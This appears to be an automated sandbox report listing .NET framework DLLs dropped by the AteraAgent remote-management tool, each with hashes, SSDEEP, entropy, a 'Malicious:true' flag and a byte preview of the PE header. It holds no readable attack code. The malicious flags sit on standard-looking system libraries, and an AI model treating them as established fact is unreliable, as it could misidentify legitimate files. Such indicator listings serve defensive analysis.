                                                                                                                                                                                                                                        SHA1:349CDF5DB44F08A9C472F8B0923F4CA6019CA236
                                                                                                                                                                                                                                        SHA-256:0E49AF27963895F413C566C0D715F0B20B3D468FB4D914A1BE45D800720CDF34
                                                                                                                                                                                                                                        SHA-512:A2A36487BEA55EAE3D9A5E384E7DDD86AB5194BB0BA42F50C48B81C432795911B5DA7942EA5667AA313AD8D39C7F5219C8C78ED054AE8613F26B7DEFDE4DF1A4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............>)... ...@....... ...............................F....@..................................(..O....@..`...............((...`.......'............................................... ............... ..H............text...D.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................ )......H.......P ......................4'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...........@...\.@...0.-...`.....D.................C.................[.....x.....-.........................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.#...C.>...K.^...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21032
                                                                                                                                                                                                                                        Entropy (8bit):6.539763813232213
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:J8R71h7yzt94dHWFgQBVWeHWFyTBVW2dNyb8E9VF6IYijSJIVxRN3B:I1dyAqgQBfqyTBZZEpYi60t
                                                                                                                                                                                                                                        MD5:185DDF848D7943C866469B6C85BE168C
                                                                                                                                                                                                                                        SHA1:E14D1F4F7941BA3E575566CD8580E597D2A16376
                                                                                                                                                                                                                                        SHA-256:62D54C9CB394CA33A2E2AA4BFC5862AEB7C4F82208C307120D531C03CCF46903
                                                                                                                                                                                                                                        SHA-512:6A669F22D30C917091A70F3A93131BC3189EF0A3110489C139A750A9250C84D61938D14646F1A061CBF1E732F86480252C6F565D82D45B2DF8D63AABF1E8F7A6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............8... ...@....... ..............................k.....@..................................8..O....@..8............*..((...`.......7............................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`.......(..............@..B.................8......H.......|!..l............1..p...X7......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*..BSJB............v4.0.30319......l.......#~..h.......#Strings....\...4...#US.........#GUID...........#Blob...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18984
                                                                                                                                                                                                                                        Entropy (8bit):6.680630337143418
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:apsBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOWb8Nyb8E9VF6IYijSJIVxZ8orQv:AsPMQMI8COYyi4oBNw4tBrcEpYi60ov
                                                                                                                                                                                                                                        MD5:0179437AE44AC887A538F44BBBA85A1B
                                                                                                                                                                                                                                        SHA1:D6158F26235B0034E834832122D7A9709CE6D386
                                                                                                                                                                                                                                        SHA-256:129B421FFD25CCAB64E61CE490FCC4072DBE43BBC3743139E04B73B54A91BDB4
                                                                                                                                                                                                                                        SHA-512:5C6D797C7C8E58AE73A4533D24D2A94714FC7FB1C318A5C1C9DE286D1582E9302440E1B193F6E04C3AD1AB606760A49E51534828CA19D8C4718A6555AE17B4A2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............3... ...@....... ..............................;W....@..................................3..O....@..............."..((...`.......2............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H........!..0...................L2.......................................s....*..s....*..0...........o....u......,..o....*.*.0..%........s..........(....r...p.$o......o....*:.(......}....*..{....*.(....z.(....z6.{.....o....*:.{......o....*.(....z:.{......o....*.(....z.(....z.BSJB............v4.0.30319......l.......#~.. .......#Strings....$...0...#US.T.......#GUID...d.......#Blob...........W..........3............................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23592
                                                                                                                                                                                                                                        Entropy (8bit):6.3177610625281115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:IbhigwLAuZtM66g/Id7WVXWgvNyb8E9VF6IYijSJIVxdTR1g2r:IbhzkKs9TEpYi60h
                                                                                                                                                                                                                                        MD5:E6639AE075EDD94FA2BC128A56EBB468
                                                                                                                                                                                                                                        SHA1:021D0245A9D83F662DC3C176BD9281FC7C78CF25
                                                                                                                                                                                                                                        SHA-256:C942ADFA7FA4F9C1B4F167EB28B153DF6A21B638915A04E1BA62E61B1F356AFA
                                                                                                                                                                                                                                        SHA-512:9EB9236557EA8E495DFC87C4DD5E511448F3916994C5943ED684EAC2C74FDB379078776DED8FD0E5FAD89442F8ECE712DC6DE7BA2AF9E1DF6D011319225FA3DB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..*.........."H... ...`....... ...............................O....@..................................G..O....`...............4..((...........F............................................... ............... ..H............text...((... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...%...................F......................................BSJB............v4.0.30319......l.......#~..........#Strings.....#......#US..#......#GUID....#......#Blob......................3................................................_.........................8.....8...*.8.....8.....8.....8.....8.....8.........*.8.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.864608994529631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:2UcX6W9aWTmNyb8E9VF6IYijSJIVx7y5zT:2UchXuEpYi60k
                                                                                                                                                                                                                                        MD5:FA52AE24F562E0519560C9EDE6F659A0
                                                                                                                                                                                                                                        SHA1:9DB85E79679EEE39276D1DD714127894DF4335EB
                                                                                                                                                                                                                                        SHA-256:66C1AB079D2735A8FD178EF2D36F0627E8A33AF362EB0054D7111F25BF4E7D49
                                                                                                                                                                                                                                        SHA-512:ED4FBFCAA82BF7A9B887B5727179DED5D521E25DEBAB5C8D0BE2D484775D4B2FC6262ABA102DE9A7A4D1590ECFB6AF4E0E3D15776EE66C3EE8AEFACB7A334E33
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............B)... ...@....... ...................................@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....(.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41000
                                                                                                                                                                                                                                        Entropy (8bit):5.952017062241917
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:CoBj7kS+8mjvHTeaWKs0Sd4eeUAEpYi60vu:xPmb9WKs0PeeUJ76Yu
                                                                                                                                                                                                                                        MD5:76CC6A639A50E0F1E1C8B2638125A2C6
                                                                                                                                                                                                                                        SHA1:294DA051988C4F0E6C94BA71C67062E11602F411
                                                                                                                                                                                                                                        SHA-256:381CE849AAA4ABD28C4BFAD14349E602BAE571898FED928153607D0068ADC5F5
                                                                                                                                                                                                                                        SHA-512:8CB21F14E59BC2928F77152564ACA3599C0FB64909075559B44E6EF2DDC83EF1BFF68FC4B35218EC4BF79DBB5F0DC4401F24EC281E280C5BFA21DACCC216DEFF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..h.............. ........... ..............................7.....@.................................u...O.......8............x..((........................................................... ............... ..H............text....f... ...h.................. ..`.rsrc...8............j..............@..@.reloc...............v..............@..B........................H.......P'..\8..........._...%..,.......................................j~....%-.&(F...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rI..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r9..p.(....*2rm..p.(....*2r...p.(....*2r...p.(....*2r=..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.8957951336831576
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:8TI2pWPzWmWeNyb8E9VF6IYijSJIVxWxypH1aw:8E3bnEpYi60pph
                                                                                                                                                                                                                                        MD5:152D8A8529BB53E40562AA32BD1455EB
                                                                                                                                                                                                                                        SHA1:5915551044C314BD2BD66C23FBA86BB44227D0CD
                                                                                                                                                                                                                                        SHA-256:30C7A9ED18CFEDB8F27BB46CC4CD4B586A58BCF0AB4AC0A6D103856508ED8207
                                                                                                                                                                                                                                        SHA-512:F5A0D14D2C9B059FF56C0DE679ECECD9C3A1AF1E39057A58E590B142372344C5BD4AE594D2D76E9080FDC5814601C926665CA5B344578CB1EBBFDA8D30E396E6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............^)... ...@....... ....................................@..................................)..O....@..`...............((...`.......'............................................... ............... ..H............text...d.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................@)......H.......P ......................T'......................................BSJB............v4.0.30319......l.......#~..,.......#Strings............#US.........#GUID...........#Blob......................3......................................z...........A...\.A...0.....a.....D.................C.................[.....x.....-.........................(.....(.....(...).(...1.(...9.(...A.(...I.(...Q.(...Y.(...a.(...i.(...q.(.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.910295083255079
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lcezoy4W04WGINyb8E9VF6IYijSJIVxmZqa:lBzoy+kgEpYi60u
                                                                                                                                                                                                                                        MD5:788EEDD2BCADB4BA00C308E7D4A6D112
                                                                                                                                                                                                                                        SHA1:03E7742F956979399110C3033461D3E72904B29D
                                                                                                                                                                                                                                        SHA-256:FB80AA162FB7F3366D60FB2DC51B56A17155182B90809995E77ACA2AFE2D15F7
                                                                                                                                                                                                                                        SHA-512:25E8E352C381FE5B329CE27C02A69663C980AADFDD6C8FD5251AB5912AE63DB90D34ADD98E172A39E1E8BAC365717079F8505FDF93BCA05371682B8FB1E4D871
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............~)... ...@....... ..............................m.....@.................................,)..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`)......H.......P ..$...................t'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID....... ...#Blob......................3..................................................f...o.f...C.S.........W.................V...........%.....n...........@.....)...................M.....M.....M...).M...1.M...9.M...A.M...I.M...Q.M...Y.M...a.M...i.M...q.M.......................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.79546328311258
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cUgHWexY+WKpW5FPYNyby2sE9jBF6IYiYF85S35IVnxGUHFjekhqHbA:MH/JWKpWDQNyb8E9VF6IYijSJIVxXeHU
                                                                                                                                                                                                                                        MD5:A25577998978B87CC8D443110AB27B5E
                                                                                                                                                                                                                                        SHA1:55A2FC5DE2790AE7B7414D9193D4B10A64244658
                                                                                                                                                                                                                                        SHA-256:762B44EBE2E5FB61CF29F387D7BEE17A1550802EBA7AD153AD142FBC2EDE89D7
                                                                                                                                                                                                                                        SHA-512:77D4ED6105A65585E793CC6E4541A874DC1B269EFED8A4851AA8CD6025337C88FB726549CDB3067DAA5A0C920DBC616B7CF0E083EF184B52361C4A8D567EC2EF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0............."*... ...@....... ...............................?....@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...(.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID....... ...#Blob......................3............................................................o.s...........D.....D.....D.....D...8.D...Q.D.....D.....D...l.....U.D.................m.....m.....m...).m...1.m...9.m...A.m...I.m...Q.m...Y.m...a.m...i.m...q.m.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16936
                                                                                                                                                                                                                                        Entropy (8bit):6.7447495341904595
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:qTjbocNsWMhWqiNyb8E9VF6IYijSJIVxtLyoWK:6boYyFiEpYi60tFn
                                                                                                                                                                                                                                        MD5:54468FADBEC6DBA182D2C39AE9CB497B
                                                                                                                                                                                                                                        SHA1:521A56DCBE7D3178BF62616A9EFE3D6626059F70
                                                                                                                                                                                                                                        SHA-256:59567BC0FD8A4872FAC5A214CD853F019149A89097EDDC41FCD70AF2CC6993B8
                                                                                                                                                                                                                                        SHA-512:90FAAC13B9102021EC79A9AB4F20C423E1B4D2262572CC3707F5EE55C394A65205C808FCFB52AF4D86677BB5E93B198E4DBC12CB22AD4EC3DF5FB275ACAB57C1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.................. ...@....... ..............................y.....@..................................-..O....@..................((...`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l.......#~......|...#Strings....x.......#US.|.......#GUID.......(...#Blob......................3................................'.....).........u.................=......."...:."...W.".....".....".....".....".....".....[.....".................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;./...C.J...K.j...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.844665709244569
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:4SKiWIhWG3Nyb8E9VF6IYijSJIVxLp8V9:4SK8l7EpYi609I
                                                                                                                                                                                                                                        MD5:E34063501621BD77546941CDB2B5C1F2
                                                                                                                                                                                                                                        SHA1:B7AA35806E1C69556AECFC351AA7A3D6C1585402
                                                                                                                                                                                                                                        SHA-256:4DE4CF5C699EF43CC37E53A66E86B771DE7BC7029179173EDC28EA58BD11B8B8
                                                                                                                                                                                                                                        SHA-512:DF03F08E92D2E0FD5B6CBAA62050A918EA01BA2011DBDDE1D5B7DEC0EED04CB95570A4BBE0C1D45E8CF4AEBC38D287010FF76BD63B7C1209A51D8FD7E3307497
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................]V....@.................................t(..O....@.. ...............((...`......<'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..l....................&......................................BSJB............v4.0.30319......l.......#~......@...#Strings....D.......#US.H.......#GUID...X.......#Blob......................3......................................................\.....0.....'.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16424
                                                                                                                                                                                                                                        Entropy (8bit):6.785674552898244
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/0KbZWApWmWTpWSDNyb8E9VF6IYijSJIVxkp8lkBU5:sKRyhfEpYi603L5
                                                                                                                                                                                                                                        MD5:318C94B42D32AF384E8A32B518002E7F
                                                                                                                                                                                                                                        SHA1:084BFDD4A02F365B305241ED4C0A458940BADB70
                                                                                                                                                                                                                                        SHA-256:C5D36F0A84164B0ED3B7F6B2906F6A58D610A3AD6EDF3ABC288338A8625931B5
                                                                                                                                                                                                                                        SHA-512:C03AA9CD8171822971CCADFE1AAE2D07B3FD9749C3D147A66276C783BC708148D51B2DB6ED644DCE8490D144B339D6587B72A540D1702D3FF754EAAA08B735A3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............)... ...@....... ....................................@.................................>)..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................r)......H.......p .......................(........................................(....*..(....*..(....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings....`.......#US.h.......#GUID...x...(...#Blob...........G..........3.............................................."...........C...........u...............m.b...........J.....J.....J.....J...6.J...O.J.....J.....J...j.C...S.J.............................P ............X ............` ......4.....h ....................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.874692610973363
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:qb1nWCXWr7Nyb8E9VF6IYijSJIVxnY3An:U7yXEpYi60j
                                                                                                                                                                                                                                        MD5:A972AE027F809D65147B5E5CCE0CC799
                                                                                                                                                                                                                                        SHA1:BD46B74E9CEF9A424F6915505CBD2B1011131ACA
                                                                                                                                                                                                                                        SHA-256:C57017889813A1732C512CC5988EFD08746CB02471C8B19C3DF3A163D7AF909B
                                                                                                                                                                                                                                        SHA-512:F46960DEF427278CFEABA9B32F58BEA4ACA024BBF0D6641A24FE3FA84CBC8FA7DDB8D5B1776B18EAA5EFCDEC5CEB6551F3200BD8B202C7302A938E95B07F780F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................2.....@..................................(..O....@..T...............((...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~.. ...t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....6.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15912
                                                                                                                                                                                                                                        Entropy (8bit):6.777125012846138
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:HLyW7TWyDNyb8E9VF6IYijSJIVxRr9nw4:rfPfEpYi60D
                                                                                                                                                                                                                                        MD5:DAA6187A2ED4605964108B9ECED1CDEA
                                                                                                                                                                                                                                        SHA1:52D53C523EE8331D6AED99475290F979513A54FA
                                                                                                                                                                                                                                        SHA-256:1349E02D55471E06C4936425055BD61880773A861AFDD2E7421D4755BEA62841
                                                                                                                                                                                                                                        SHA-512:07F284D4A7941673D5F5D8436D2125EAA4DF6CD8605B26F32F6E90F4C35CCD07A2100E640E4A7414741F8DED3396C31F1FDDC75759A6AB3708EE59DDF1769530
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............2*... ...@....... ....................................@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...0...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.7.....7.....7...C.7.....7.....7...[.7...x.7...-.0.....7.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15400
                                                                                                                                                                                                                                        Entropy (8bit):6.906192008068945
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:a6Rb32WVzWwtNyb8E9VF6IYijSJIVx00yf8yVo:1Rb3dtJEpYi60Sf8n
                                                                                                                                                                                                                                        MD5:1DD9B77627E1DCD7B80AEB2EE27A606B
                                                                                                                                                                                                                                        SHA1:395F4961394959DA52FAE061368C44A8BCF9A312
                                                                                                                                                                                                                                        SHA-256:AB1CFF60B51761E37309A63B1F57AC9B8A588F8427867523488642A8C97320A9
                                                                                                                                                                                                                                        SHA-512:0BC71EA7FB83C155D4F17E6538A7042AD804E362EBBDDE89934F5264B7A56FD2C2191603D6A1130F70D607489F5C3C3F16FCE3D5689C020902F35CEA703F8E8C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@.................................t)..O....@..P...............((...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................K...d.K...8.8...k.....L.................K.................c...........5.........................2.....2.....2...).2...1.2...9.2...A.2...I.2...Q.2...Y.2...a.2...i.2...q.2.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dll

                                                                                                                                                                                                                                        Download File
